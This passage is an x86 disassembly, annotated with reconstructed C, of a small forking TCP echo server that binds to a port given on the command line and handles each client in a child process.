8048aba: 20 00 00
strcpy(ebp_9ch, "Echo: ");
8048abd: 8d 9d 6c ff ff ff lea -0x94(%ebp),%ebx
8048ac3: b8 00 00 00 00 mov $0x0,%eax
8048ac8: ba 1e 00 00 00 mov $0x1e,%edx
8048acd: 89 df mov %ebx,%edi
8048acf: 89 d1 mov %edx,%ecx
8048ad1: f3 ab rep stos %eax,%es:(%edi)
memset(&ebp_9ch[6], '\0', 0x78);
8048ad3: c7 85 60 ff ff ff 01 movl $0x1,-0xa0(%ebp)
8048ada: 00 00 00
8048add: eb 1b jmp 8048afa <send@plt+0x34a>
for(ebp_a0h = 1; ebp_a0h != 0; ) {
8048adf: 8b 45 08 mov 0x8(%ebp),%eax
8048ae2: 89 44 24 04 mov %eax,0x4(%esp)
8048ae6: 8d 85 64 ff ff ff lea -0x9c(%ebp),%eax
8048aec: 89 04 24 mov %eax,(%esp)
8048aef: e8 2f fe ff ff call 8048923 <send@plt+0x173>
ebp_a0h = sub_8048923(ebp_9ch, arg_0);
8048af4: 89 85 60 ff ff ff mov %eax,-0xa0(%ebp)
8048afa: 83 bd 60 ff ff ff 00 cmpl $0x0,-0xa0(%ebp)
8048b01: 75 dc jne 8048adf <send@plt+0x32f>
}
8048b03: b8 00 00 00 00 mov $0x0,%eax
8048b08: 8b 75 e4 mov -0x1c(%ebp),%esi
8048b0b: 65 33 35 14 00 00 00 xor %gs:0x14,%esi
8048b12: 74 05 je 8048b19 <send@plt+0x369>
8048b14: e8 47 fb ff ff call 8048660 <__stack_chk_fail@plt>
8048b19: 81 c4 ac 00 00 00 add $0xac,%esp
8048b1f: 5b pop %ebx
8048b20: 5e pop %esi
8048b21: 5f pop %edi
8048b22: 5d pop %ebp
8048b23: c3 ret
return 0;
}
int main()
{
8048b24: 55 push %ebp
8048b25: 89 e5 mov %esp,%ebp
8048b27: 83 e4 f0 and $0xfffffff0,%esp
8048b2a: 81 ec f0 00 00 00 sub $0xf0,%esp
8048b30: 8b 45 0c mov 0xc(%ebp),%eax
8048b33: 89 44 24 1c mov %eax,0x1c(%esp)
8048b37: 65 a1 14 00 00 00 mov %gs:0x14,%eax
8048b3d: 89 84 24 ec 00 00 00 mov %eax,0xec(%esp)
8048b44: 31 c0 xor %eax,%eax
8048b46: 83 7d 08 02 cmpl $0x2,0x8(%ebp)
8048b4a: 75 15 jne 8048b61 <send@plt+0x3b1>
8048b4c: 8b 44 24 1c mov 0x1c(%esp),%eax
8048b50: 83 c0 04 add $0x4,%eax
8048b53: 8b 00 mov (%eax),%eax
8048b55: 89 04 24 mov %eax,(%esp)
8048b58: e8 03 fc ff ff call 8048760 <atoi@plt>
8048b5d: 85 c0 test %eax,%eax
8048b5f: 75 18 jne 8048b79 <send@plt+0x3c9>
8048b61: c7 04 24 6a 8f 04 08 movl $0x8048f6a,(%esp)
8048b68: e8 43 fb ff ff call 80486b0 <puts@plt>
8048b6d: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048b74: e8 57 fb ff ff call 80486d0 <exit@plt>
8048b79: 8b 44 24 1c mov 0x1c(%esp),%eax
8048b7d: 83 c0 04 add $0x4,%eax
8048b80: 8b 00 mov (%eax),%eax
8048b82: 89 04 24 mov %eax,(%esp)
8048b85: e8 d6 fb ff ff call 8048760 <atoi@plt>
8048b8a: 89 44 24 30 mov %eax,0x30(%esp)
8048b8e: c7 44 24 40 ee 88 04 movl $0x80488ee,0x40(%esp)
8048b95: 08
8048b96: c7 84 24 c4 00 00 00 movl $0x10000000,0xc4(%esp)
8048b9d: 00 00 00 10
8048ba1: 8d 44 24 40 lea 0x40(%esp),%eax
8048ba5: 83 c0 04 add $0x4,%eax
8048ba8: 89 04 24 mov %eax,(%esp)
8048bab: e8 60 fb ff ff call 8048710 <sigfillset@plt>
8048bb0: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8048bb7: 00
8048bb8: 8d 44 24 40 lea 0x40(%esp),%eax
8048bbc: 89 44 24 04 mov %eax,0x4(%esp)
8048bc0: c7 04 24 11 00 00 00 movl $0x11,(%esp)
8048bc7: e8 b4 fb ff ff call 8048780 <sigaction@plt>
8048bcc: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8048bd3: 00
8048bd4: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048bdb: 00
8048bdc: c7 04 24 02 00 00 00 movl $0x2,(%esp)
8048be3: e8 88 fb ff ff call 8048770 <socket@plt>
8048be8: 89 44 24 34 mov %eax,0x34(%esp)
8048bec: 83 7c 24 34 00 cmpl $0x0,0x34(%esp)
8048bf1: 79 2f jns 8048c22 <send@plt+0x472>
8048bf3: a1 7c b0 04 08 mov 0x804b07c,%eax
8048bf8: 89 44 24 0c mov %eax,0xc(%esp)
8048bfc: c7 44 24 08 19 00 00 movl $0x19,0x8(%esp)
8048c03: 00
8048c04: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048c0b: 00
8048c0c: c7 04 24 87 8f 04 08 movl $0x8048f87,(%esp)
8048c13: e8 78 fa ff ff call 8048690 <fwrite@plt>
8048c18: b8 ff ff ff ff mov $0xffffffff,%eax
8048c1d: e9 36 02 00 00 jmp 8048e58 <send@plt+0x6a8>
8048c22: c7 44 24 28 10 00 00 movl $0x10,0x28(%esp)
8048c29: 00
8048c2a: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp)
8048c31: 00
8048c32: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048c39: 00
8048c3a: 8d 84 24 cc 00 00 00 lea 0xcc(%esp),%eax
8048c41: 89 04 24 mov %eax,(%esp)
8048c44: e8 d7 fa ff ff call 8048720 <memset@plt>
8048c49: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp)
8048c50: 00
8048c51: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048c58: 00
8048c59: 8d 84 24 dc 00 00 00 lea 0xdc(%esp),%eax
8048c60: 89 04 24 mov %eax,(%esp)
8048c63: e8 b8 fa ff ff call 8048720 <memset@plt>
8048c68: 66 c7 84 24 cc 00 00 movw $0x2,0xcc(%esp)
8048c6f: 00 02 00
8048c72: 8b 44 24 30 mov 0x30(%esp),%eax
8048c76: 0f b7 c0 movzwl %ax,%eax
8048c79: 89 04 24 mov %eax,(%esp)
8048c7c: e8 ef f9 ff ff call 8048670 <htons@plt>
8048c81: 66 89 84 24 ce 00 00 mov %ax,0xce(%esp)
8048c88: 00
8048c89: c7 84 24 d0 00 00 00 movl $0x0,0xd0(%esp)
8048c90: 00 00 00 00
8048c94: c7 44 24 2c 01 00 00 movl $0x1,0x2c(%esp)
8048c9b: 00
8048c9c: c7 44 24 10 04 00 00 movl $0x4,0x10(%esp)
8048ca3: 00
8048ca4: 8d 44 24 2c lea 0x2c(%esp),%eax
8048ca8: 89 44 24 0c mov %eax,0xc(%esp)
8048cac: c7 44 24 08 02 00 00 movl $0x2,0x8(%esp)
8048cb3: 00
8048cb4: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048cbb: 00
8048cbc: 8b 44 24 34 mov 0x34(%esp),%eax
8048cc0: 89 04 24 mov %eax,(%esp)
8048cc3: e8 58 f9 ff ff call 8048620 <setsockopt@plt>
8048cc8: 85 c0 test %eax,%eax
8048cca: 74 2f je 8048cfb <send@plt+0x54b>
8048ccc: a1 7c b0 04 08 mov 0x804b07c,%eax
8048cd1: 89 44 24 0c mov %eax,0xc(%esp)
8048cd5: c7 44 24 08 1c 00 00 movl $0x1c,0x8(%esp)
8048cdc: 00
8048cdd: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048ce4: 00
8048ce5: c7 04 24 a1 8f 04 08 movl $0x8048fa1,(%esp)
8048cec: e8 9f f9 ff ff call 8048690 <fwrite@plt>
8048cf1: b8 ff ff ff ff mov $0xffffffff,%eax
8048cf6: e9 5d 01 00 00 jmp 8048e58 <send@plt+0x6a8>
8048cfb: 8b 44 24 28 mov 0x28(%esp),%eax
8048cff: 89 44 24 08 mov %eax,0x8(%esp)
8048d03: 8d 84 24 cc 00 00 00 lea 0xcc(%esp),%eax
8048d0a: 89 44 24 04 mov %eax,0x4(%esp)
8048d0e: 8b 44 24 34 mov 0x34(%esp),%eax
8048d12: 89 04 24 mov %eax,(%esp)
8048d15: e8 e6 f9 ff ff call 8048700 <bind@plt>
8048d1a: 83 f8 ff cmp $0xffffffff,%eax
8048d1d: 75 2f jne 8048d4e <send@plt+0x59e>
8048d1f: a1 7c b0 04 08 mov 0x804b07c,%eax
8048d24: 89 44 24 0c mov %eax,0xc(%esp)
8048d28: c7 44 24 08 17 00 00 movl $0x17,0x8(%esp)
8048d2f: 00
8048d30: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048d37: 00
8048d38: c7 04 24 be 8f 04 08 movl $0x8048fbe,(%esp)
8048d3f: e8 4c f9 ff ff call 8048690 <fwrite@plt>
8048d44: b8 ff ff ff ff mov $0xffffffff,%eax
8048d49: e9 0a 01 00 00 jmp 8048e58 <send@plt+0x6a8>
8048d4e: c7 44 24 04 80 00 00 movl $0x80,0x4(%esp)
8048d55: 00
8048d56: 8b 44 24 34 mov 0x34(%esp),%eax
8048d5a: 89 04 24 mov %eax,(%esp)
8048d5d: e8 de f9 ff ff call 8048740 <listen@plt>
8048d62: 83 f8 ff cmp $0xffffffff,%eax
8048d65: 75 2f jne 8048d96 <send@plt+0x5e6>
8048d67: a1 7c b0 04 08 mov 0x804b07c,%eax
8048d6c: 89 44 24 0c mov %eax,0xc(%esp)
8048d70: c7 44 24 08 1b 00 00 movl $0x1b,0x8(%esp)
8048d77: 00
8048d78: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048d7f: 00
8048d80: c7 04 24 d6 8f 04 08 movl $0x8048fd6,(%esp)
8048d87: e8 04 f9 ff ff call 8048690 <fwrite@plt>
8048d8c: b8 ff ff ff ff mov $0xffffffff,%eax
8048d91: e9 c2 00 00 00 jmp 8048e58 <send@plt+0x6a8>
while(true) {
8048d96: 8d 44 24 28 lea 0x28(%esp),%eax
8048d9a: 89 44 24 08 mov %eax,0x8(%esp)
8048d9e: 8d 84 24 dc 00 00 00 lea 0xdc(%esp),%eax
8048da5: 89 44 24 04 mov %eax,0x4(%esp)
8048da9: 8b 44 24 34 mov 0x34(%esp),%eax
8048dad: 89 04 24 mov %eax,(%esp)
8048db0: e8 cb f8 ff ff call 8048680 <accept@plt>
8048db5: 89 44 24 38 mov %eax,0x38(%esp)
8048db9: 83 7c 24 38 ff cmpl $0xffffffff,0x38(%esp)
8048dbe: 75 28 jne 8048de8 <send@plt+0x638>
8048dc0: a1 7c b0 04 08 mov 0x804b07c,%eax
8048dc5: 89 44 24 0c mov %eax,0xc(%esp)
8048dc9: c7 44 24 08 28 00 00 movl $0x28,0x8(%esp)
8048dd0: 00
8048dd1: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8048dd8: 00
8048dd9: c7 04 24 f4 8f 04 08 movl $0x8048ff4,(%esp)
8048de0: e8 ab f8 ff ff call 8048690 <fwrite@plt>
8048de5: 90 nop
8048de6: eb ae jmp 8048d96 <send@plt+0x5e6>
8048de8: 8b 84 24 e0 00 00 00 mov 0xe0(%esp),%eax
8048def: 89 04 24 mov %eax,(%esp)
8048df2: e8 59 f8 ff ff call 8048650 <inet_ntoa@plt>
8048df7: 89 44 24 04 mov %eax,0x4(%esp)
8048dfb: c7 04 24 1d 90 04 08 movl $0x804901d,(%esp)
8048e02: e8 39 f8 ff ff call 8048640 <printf@plt>
8048e07: e8 24 f9 ff ff call 8048730 <fork@plt>
8048e0c: 89 44 24 3c mov %eax,0x3c(%esp)
esp_3ch = fork();
8048e10: 83 7c 24 3c 00 cmpl $0x0,0x3c(%esp)
8048e15: 75 30 jne 8048e47 <send@plt+0x697>
if(esp_3ch == 0) {
8048e17: 8b 44 24 38 mov 0x38(%esp),%eax
8048e1b: 89 04 24 mov %eax,(%esp)
8048e1e: e8 5c fc ff ff call 8048a7f <send@plt+0x2cf>
sub_8048a7f(esp_38h);
8048e23: 8b 44 24 38 mov 0x38(%esp),%eax
8048e27: 89 04 24 mov %eax,(%esp)
8048e2a: e8 71 f9 ff ff call 80487a0 <close@plt>
close(esp_38h);
8048e2f: 8b 44 24 34 mov 0x34(%esp),%eax
8048e33: 89 04 24 mov %eax,(%esp)
8048e36: e8 65 f9 ff ff call 80487a0 <close@plt>
close(esp_34h);
8048e3b: c7 04 24 00 00 00 00 movl $0x0,(%esp)
8048e42: e8 89 f8 ff ff call 80486d0 <exit@plt>
exit(EXIT_SUCCESS);
}
8048e47: 8b 44 24 38 mov 0x38(%esp),%eax
8048e4b: 89 04 24 mov %eax,(%esp)
8048e4e: e8 4d f9 ff ff call 80487a0 <close@plt>
close(esp_38h);
8048e53: e9 3e ff ff ff jmp 8048d96 <send@plt+0x5e6>
}
8048e58: 8b 94 24 ec 00 00 00 mov 0xec(%esp),%edx
8048e5f: 65 33 15 14 00 00 00 xor %gs:0x14,%edx
8048e66: 74 05 je 8048e6d <send@plt+0x6bd>
8048e68: e8 f3 f7 ff ff call 8048660 <__stack_chk_fail@plt>
8048e6d: c9 leave
8048e6e: c3 ret
}
8048e6f: 90 nop
8048e70: 55 push %ebp
8048e71: 57 push %edi
8048e72: 31 ff xor %edi,%edi
8048e74: 56 push %esi
8048e75: 53 push %ebx
8048e76: e8 75 f9 ff ff call 80487f0 <send@plt+0x40>
8048e7b: 81 c3 85 21 00 00 add $0x2185,%ebx
8048e81: 83 ec 1c sub $0x1c,%esp
8048e84: 8b 6c 24 30 mov 0x30(%esp),%ebp
8048e88: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi
8048e8e: e8 59 f7 ff ff call 80485ec <setsockopt@plt-0x34>
8048e93: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax
8048e99: 29 c6 sub %eax,%esi
8048e9b: c1 fe 02 sar $0x2,%esi
8048e9e: 85 f6 test %esi,%esi
8048ea0: 74 27 je 8048ec9 <send@plt+0x719>
8048ea2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8048ea8: 8b 44 24 38 mov 0x38(%esp),%eax
8048eac: 89 2c 24 mov %ebp,(%esp)
8048eaf: 89 44 24 08 mov %eax,0x8(%esp)
8048eb3: 8b 44 24 34 mov 0x34(%esp),%eax
8048eb7: 89 44 24 04 mov %eax,0x4(%esp)
8048ebb: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4)
8048ec2: 83 c7 01 add $0x1,%edi
8048ec5: 39 f7 cmp %esi,%edi
8048ec7: 75 df jne 8048ea8 <send@plt+0x6f8>
8048ec9: 83 c4 1c add $0x1c,%esp
8048ecc: 5b pop %ebx
8048ecd: 5e pop %esi
8048ece: 5f pop %edi
8048ecf: 5d pop %ebp
8048ed0: c3 ret
8048ed1: eb 0d jmp 8048ee0 <send@plt+0x730>
8048ed3: 90 nop
8048ed4: 90 nop
8048ed5: 90 nop
8048ed6: 90 nop
8048ed7: 90 nop
8048ed8: 90 nop
8048ed9: 90 nop
8048eda: 90 nop
8048edb: 90 nop
8048edc: 90 nop
8048edd: 90 nop
8048ede: 90 nop
8048edf: 90 nop
8048ee0: f3 c3 repz ret
Disassembly of section .fini:
08048ee4 <.fini>:
8048ee4: 53 push %ebx
8048ee5: 83 ec 08 sub $0x8,%esp
8048ee8: e8 03 f9 ff ff call 80487f0 <send@plt+0x40>
8048eed: 81 c3 13 21 00 00 add $0x2113,%ebx
8048ef3: 83 c4 08 add $0x8,%esp
8048ef6: 5b pop %ebx
8048ef7: c3 ret